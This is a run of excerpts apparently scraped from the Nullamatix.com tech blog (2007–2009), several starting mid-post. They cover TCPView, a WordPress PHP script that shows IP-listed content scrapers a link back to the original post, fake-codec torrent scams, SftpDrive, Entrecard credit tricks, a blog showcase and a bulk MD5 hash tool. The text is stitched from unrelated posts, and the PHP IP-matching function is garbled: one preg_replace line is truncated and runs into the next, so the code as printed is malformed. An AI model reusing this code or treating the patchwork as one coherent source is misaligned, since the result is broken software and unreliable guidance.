• February 15, 2008 -- Picture: The Importance of a Good Firewall
• January 23, 2008 -- Yet Another Way to Make Money Online
• January 21, 2008 -- Linux Requires Windows - No, Seriously

Post Originally Published at: Nullamatix.com - Technology Made Simple

Anyway, the reason I’m telling you all this is because one of the many excellent utilities Sysinternals released is TCPView. TCPView provides a semi-detailed list of all the TCP/UDP connections based on: established, listening, and time_wait. In addition, TCPView will let you know where the connections are coming from, and where they’re going. Click the image on the right to see the full sized version in a new window.

Several of the firewalls on the market today provide a “network monitor” that offer a little more detail than Sysinternal’s TCPView, but you might be surprised to see what your firewall isn’t showing you.

To download and read more about Sysinternal’s TCPView, click here to visit the official page.

This free utility is definitely going into my permanent arsenal or Windows tools. Are you aware of any free tools that provide similar features? Take the time to share your suggestions in the comments, I’d love to read about ‘em.

More From Nullamatix.com:

• February 15, 2008 -- Picture: The Importance of a Good Firewall
• December 6, 2007 -- GMail: Sorry, You Account Has Been Disabled
• December 12, 2007 -- Spend Time On Yourself
• November 26, 2007 -- Stop Using Facebook and MySpace or Stop Complaining

Post Originally Published at: Nullamatix.com - Technology Made Simple

First Things First

In order for this to work, we’ll need a list of IP addresses that known offenders use. For your convenience, I’ve compiled this massive list of 5,780 offending IPs (I highly recommend you use your own unique list compiled from your own server logs). Copy those IPs and save them to your server’s root directory with a filename of your choice. Remember the filename, you’ll need it in just a second. Now that you’ve got your enemy plotted, lets get to the code.

Backup, Modify, Test

Backup your theme’s single.php to single.post.original.txt or something of your choice. Now, open up single.php with a text editor and insert the code below at the very top of your single.php file.

Please note: I take absolutely no credit for this code. The original source is located here.

<?php
function chkiplist($ip) {
$lines = file("THE-FILENAME-OF-IP-LIST.txt");
$found = false;
$split_it = split("\.",$ip);
$ip = "1" . sprintf("%03d",$split_it[0]) .
sprintf("%03d",$split_it[1]) . sprintf("%03d",$split_it[2]) .
sprintf("%03d",$split_it[3]);
foreach ($lines as $line) {
$line = chop($line);
$line = str_replace("x","*",$line);
$line = preg_replace("|[A-Za-z$max = $line;
$min = $line;
if ( strpos($line,"*",0) <> "" ) {
$max = str_replace("*","999",$line);
$min = str_replace("*","000",$line);
}
if ( strpos($line,"?",0) <> "" ) {
$max = str_replace("?","9",$line);
$min = str_replace("?","0",$line);
}
if ( $max == "" ) { continue; };
if ( strpos($max," - ",0) <> "" ) {
$split_it = split(" - ",$max);
if ( !preg_match("|\d{1,3}\.|",$split_it[1]) ) {
$max = $split_it[0];
}
else {
$max = $split_it[1];
};
}
if ( strpos($min," - ",0) <> "" ) {
$split_it = split(" - ",$min);
$min = $split_it[0];
}
$split_it = split("\.",$max);
for ( $i=0;$i<4;$i++ ) {
if ( $i == 0 ) { $max = 1; };
if ( strpos($split_it[$i],"-",0) <> "" ) {
$another_split = split("-",$split_it[$i]);
$split_it[$i] = $another_split[1];
}
$max .= sprintf("%03d",$split_it[$i]);
}
$split_it = split("\.",$min);
for ( $i=0;$i<4;$i++ ) {
if ( $i == 0 ) { $min = 1; };
if ( strpos($split_it[$i],"-",0) <> "" ) {
$another_split = split("-",$split_it[$i]);
$split_it[$i] = $another_split[0];
}
$min .= sprintf("%03d",$split_it[$i]);
}
if ( ($ip <= $max) && ($ip >= $min) ) {
$found = true;
break;
};
}
return $found;
};
$status = chkiplist($_SERVER['REMOTE_ADDR']);
?>

Ok, now what? Change the third line so the filename you saved your IPs to is specified, then look for:

<?php the_content(); ?>

Immediately before that line, add something similar to the following:

<?php if ($status == 1): ?>
Hey, thanks for scraping my post:
<a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>">
<?php the_title(); ?><br />
Click here to see the site this content was stolen from!
<?php the_excerpt(); ?> <?php the_title(); ?></a>
Original Source: <?php the_permalink(); ?>
<?php else: ?>

The spam bots will see this:

Hey, thanks for scraping my post:

Defeat Spam Blogs With IP Based Content Delivery

Click here to see the site this content was stolen from!
The majority of bloggers are forced to deal with spam blogs
(splogs, aka scraper blogs), and even though[...]

Defeat Spam Blogs With IP Based Content Delivery

Original Source:

www.nullamatix.com/defeat-spam-blogs-with-ip-based-content-delivery/

We’re not done yet. To prevent any PHP errors, you’ll need to add this:

<?php endif; ?>

immediately after:

<?php the_content(); ?>

The whole thing, minus the chkiplist() function defined above, should look something like this:

<div class="entry-content">
<?php if ($status == 1): ?>
Hey, thanks for scraping my post:
<a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>">
<?php the_title(); ?><br />
Click here to see the site this content was stolen from!
<?php the_excerpt(); ?> <?php the_title(); ?></a>
Original Source: <?php the_permalink(); ?>
<?php else: ?>
<?php the_content(); ?>
<?php endif; ?>
</div>

To test everything out and make sure your blog is up and running properly, just visit a post like you normally would. If the content is displays as usual, you’re good to go. To test the scraper’s view, just add your IP to the list of known spammers. The script above also supports wildcards, among other variations. Check out the original source mentioned above for more details.

To Conclude…

This won’t immediately work on every new splog that comes out, but if you actively check your server logs, you can stop most of ‘em by adding the offending IP(s). Now for the real question: what other purposes might this nifty little script serve? Just use your imagination - there is a hidden agenda behind this entire post

More From Nullamatix.com:

• May 26, 2009 -- 2HOST $5 512MB Ram Xen VPS (LowEndBox)
• July 25, 2007 -- Google Webmaster Tools Fails To Provide Accurate Information, Sometimes
• November 15, 2007 -- Thanksgiving Deals, Discounts, and Sales - Black Friday 2007 Tips and Info
• July 25, 2007 -- Comcast For The Win - Power Cycling Your Cable Modem Is Useless

Post Originally Published at: Nullamatix.com - Technology Made Simple

Some Torrents Provide False Hope

A large percentage of torrent users have downloaded falsely labeled movies only to end up with a password protected .rar archive. Conveniently, the password is no where in the readme, or the nfo. Instead, users are instructed to visit an affiliate (CPA) site and fill in their email address in order to receive the archive’s password. The password never comes, nor will the enjoyment one might have experienced had they been able to watch the movie.

Out With The Old & In With The New

The new plague haunting torrent sites is pretty nasty and will probably earn the malicious persons way more cash in the end. Here’s an excerpt from TorrentFreak,

“This particular brand notifies people who try to play a video file they’ve just downloaded that they need to download a codec if they want to play the file. The site they are redirected to is of course a scam, most of them are filled with annoying ads.“

Annoying ads aside, the codec that’s required to play the movie is the big earner. Most of these pay per install (PPI) sites pay up to a dollar, if not more, every time an affiliate gets the company’s software installed. Twenty torrent sites at an underestimated download count of twenty downloads per site is $400. To double that, upload 2 torrents to all twenty torrent sites. Not everyone has the same standard of living, obviously, but I could easily manage on $400 a day.

Let’s Take This One Step Further

Not only does the torrent’s unloader earn a dollar for every codec installed, but say they also included a custom written bot to add your network into their collection of botnets. Your network is now operating as a spam relay, a seeder to help spread their garbage torrents even more, an Adsense clickbot to make them even more money, and countless other malicious activities you’re probably unaware of. I’ve said it before, and I’ll say it again; torrents are bad news. And until these malicious pricks learn to respect their fellow humans, gain some integrity, establish some morals, and redefine their ethics, BitTorrent is a protocol I’ll continue to stay away from.

More From Nullamatix.com:

• December 14, 2007 -- Phrases You Shouldn’t Say Unless You Really Mean Them
• March 18, 2008 -- eBay is Leaving Commission Junction - Poor Mans BANS Updates Required
• November 28, 2007 -- Find r57 and c99 Shells Hidden Inside PHP and TXT Files
• November 30, 2007 -- Windows XP SP3 (Service Pack 3) Improves Performance

Post Originally Published at: Nullamatix.com - Technology Made Simple

Running an ftp daemon just to accomplish this is not only a waste of precious system resources, but an added security risk as well. A great tool that seamlessly integrates into Windows and avoids a lot of the hassles involved with FTP clients (and daemons) is SftpDrive.

SftpDrive is a Windows based utility that takes advantage of the SSH daemon that either your server, or your hosting company’s server should have available. Not only that, but it’s a breeze to setup.

Once configured and connected, SftpDrive produces a “mapped network drive” under My Computer. Whenever data is sent to or from this mapped network drive, it’s transferred through SSH and fully encrypted from point to point.

To use SftpDrive, just open either Windows Explorer or My Computer, then drag and drop locally stored files from your Windows machine to the /home/user directory of the Linux Server. Files can then be copied to the /www directory or whichever directory your site’s content is stored in. SftpDrive is so configurable that you can share either the entire root directory of the server, or just a custom directory of your choice.

The ability to reconnect at Windows login (startup) is an added bonus that assures you’re connected to the server every time you fire up the PC. Uploading content and maintaining pages are just a drag and drop away. With the simplicity of operability, and the added security, this utility should be a must for any web designer using a Linux server, you’ll thank me later.

More From Nullamatix.com:

• January 20, 2008 -- The Poor Man’s BANS Is Performing Well (Update)
• April 24, 2009 -- New Page: Interesting Server Logs
• January 15, 2008 -- Make Money With a Poor Mans BANS (Build a Niche Store)
• August 30, 2009 -- Whitelists Will Reign

Post Originally Published at: Nullamatix.com - Technology Made Simple

Entrecard Power Dropping

Anyway, visit http://www.powerdropping.com (now defunct) to start earning 300 Entrecard credits in 20 minutes or less. Based on my research, this is the fastest way to rack up Entrecard credits. Someone needs to figure out how to use iMacros or something to make this whole thing automated. 300 Entrecards in 5 minutes or less sounds much better.

Link Juice is Awesome

Wow, so after reading Walt’s entire post about PowerDropping.com, I realized he’s returning the favor to bloggers who blog about the project. There’s no doubt in my mind that if Walt continues churning out ideas like this, he’ll have the ability to quit his job before 2008 is over. He’s already had great success, and even though he’s no longer regularly posting on 365tofreedom.com, I wouldn’t mind seeing future monthly earnings reports. Good luck, Walt.

Nullamatix.com Reorganization

This doesn’t have anything to do with Entrecard, but I just wanted to let my readers know that over the next couple days I’ll be working on reorganizing Nullamatix. Early in Nullamatix’s life I made the mistake of converting the short list of easy to manage categories to tags. What a nightmare that’s been. The tag list has grown out of control and is just plain silly.

Also, if you’d like some link juice for your site, feel free to submit a guest post, or send in your site for a free review. Finally, if you haven’t already, consider subscribing to the full Nullamatix.com RSS feed. Why? You’ll never miss an update, your chances of learning something useful increase substantially, and it’d make me happy.

More From Nullamatix.com:

• August 22, 2009 -- Howto: Fortinet Pub Key Authentication for Backups
• August 30, 2009 -- Whitelists Will Reign
• July 25, 2007 -- Comcast For The Win - Power Cycling Your Cable Modem Is Useless
• December 11, 2007 -- thehills.mtv.com Hits Google Trends #1 Spot For Hours

Post Originally Published at: Nullamatix.com - Technology Made Simple

Affiliate Confessions by Alan LeStourgeon

Last night I was trying to recall where I discovered this blog. The archives indicate an age of just a few months, but there’s enough information here that anyone who visits this site and doesn’t end up subscribing is just silly. One unique quality I particularly find useful about Alan’s blog is the amount of research he performs and shares. A popular example is his Massive Entrecard Advertising Experiment, and the update provided a few days later. Alan has a lot to offer, and despite being so young (the blog, that is), he’s definitely on to something.

Court’s Internet Marketing & Strategy Blog

I’m not sure why I’ve never come across Court’s blog before, but this guy has some really awesome info. For the beginners, there’s an excellent getting started section that clearly explains how to make money blogging. But don’t let that fool you, Court also touches on some pretty heavy stuff for the veteran Internet Marketers, too. Stop by and take a look, you’ll be surprised. Oddly enough, as I was browsing the archives, Court also published a similar list of 5 Emerging Make Money Online sites. Court’s blog is well organized, easy to navigate, has loads of extremely useful information, and is definitely a blog worth subscribing to.

Make Money Online With Blogger Unleashed

Despite not being updated since February 8th, Blogger Unleashed still provides some valuable information. I will say that I’m not very fond of the cut-off RSS feeds (come on man, give us the full deal), or the fact that every post contains the word “Folks.” However, there’s some pretty interesting ideas worth experimenting with. For example, check out his post about baiting and switching, or one of my favorites, Viral Marketing Ideas. Vic may come off as a jerk in his writing, but why complain when he’s giving up such great ideas? Hopefully he’ll continue writing; I’d hate to remove his blog from my subscriptions.

Daily Blog Tips - Effective Blog Improvement

Sometimes making money isn’t about Adsense or Affiliates, but ways to improve your blog to increase traffic & revenue. Daily Blog Tips provides excellent information that every blogger should know. One of the many tips provided is a way to increase the amount of comments your blog receives by simply making it easier for your visitors to comment. Another funny and innovative idea to increase traffic was presented in this post, which I’ve been meaning to take advantage of myself. Finally, Daily Blog Tips is just awesome as a result of the creative people involved (Skellie is one of my personal favorites; check out her latest entry here). Hopefully this blog will continue churning out creative and useful ideas for years to come.

PowerDosh by Daniel Harrison

PowerDosh is another new blog with some pretty creative content. Daniel shares a variety of realistic money making ideas, goal setting strategies, experiments, and personal progress. One of the ideas he’s currently experimenting with is building residual income with mini sites. Again, I prefer full length RSS feeds which is something I hope to see from PowerDosh in the future, but most of the time I’ll usually end up clicking the continue reading link to finish reading the post. Daniel expands on the idea of building backlinks with SEO friendly directories, and provides several useful tips for brand new Wordpress blogs. Whenever I check my feeds, PowerDosh is definitely a blog I hope to see an update from.

If you’re interesting in having your site listed in a future showcase similar to this one, check out my web site review opportunity.

More From Nullamatix.com:

• January 2, 2008 -- How To Get Included In The Google Index In 48 Hours Or Less
• February 12, 2008 -- 2nd Darkest Day In American History - Congress Fails Us Again
• October 12, 2007 -- Halloween Masks Prevent Customer and Employee Safety
• December 5, 2007 -- Entrecard, The Digital Business Card Program That Works

Post Originally Published at: Nullamatix.com - Technology Made Simple

What’s a Bulk MD5 Hash Generator?

The concept of the batch MD5 hash generator is simple. Let’s say you have a list of values: names, addresses, telephone numbers, URLs, whatever, it doesn’t matter, and you’d like to convert each of those values to MD5 for whatever reason; then the official Nullamatix.com Bulk MD5 Hash Generator is exactly what you need. Really, it’s easy. Just drop your data into the text box and click submit. The script will then convert each line into the corresponding MD5 hash.

The Story… (really boring stuff)

This project started when one of my superiors asked for a way to identify, tag, and associate IT equipment with individual employees during an upcoming disaster recovery scenario. Since I’ve been playing with Rainbow Tables lately, I thought to myself, “Why not take their names, add a number, and convert the clear text values to MD5?” After wasting nearly an hour searching Google for a multiline MD5 hash generator, I decided to give up and write my own. So I wrote the script and presented the converted list to my superiors. They laughed and said the idea was a little more than what they were looking for. Well I thought the concept was awesome, and because I couldn’t find this utility anywhere else, I’ve thrown together a web interface and released it to the Internets.

Consider The Following:

• A new line (enter key) by itself returns:
  d41d8cd98f00b204e9800998ecf8427e
• Wordpress auto converts consecutive new lines to “<p></p>”
• Results are displayed underneath the submit button.
• There are plans to integrate ajax.
• The maximum input value is currently limited to 500 characters.
• Input should follow the same format demonstrated in the textarea.
• Bugs - Please Report Them

Click here to start using the Nullamatix.com Multiline MD5 Hash Generator.

More From Nullamatix.com:

• December 9, 2007 -- Fox News Debates The Quality of Sex With Young Boys
• October 12, 2007 -- Halloween Masks Prevent Customer and Employee Safety
• December 19, 2007 -- Part 1: A Guide To Blogging For Profit
• March 1, 2008 -- Yet Another Reason To Avoid Torrents

Post Originally Published at: Nullamatix.com - Technology Made Simple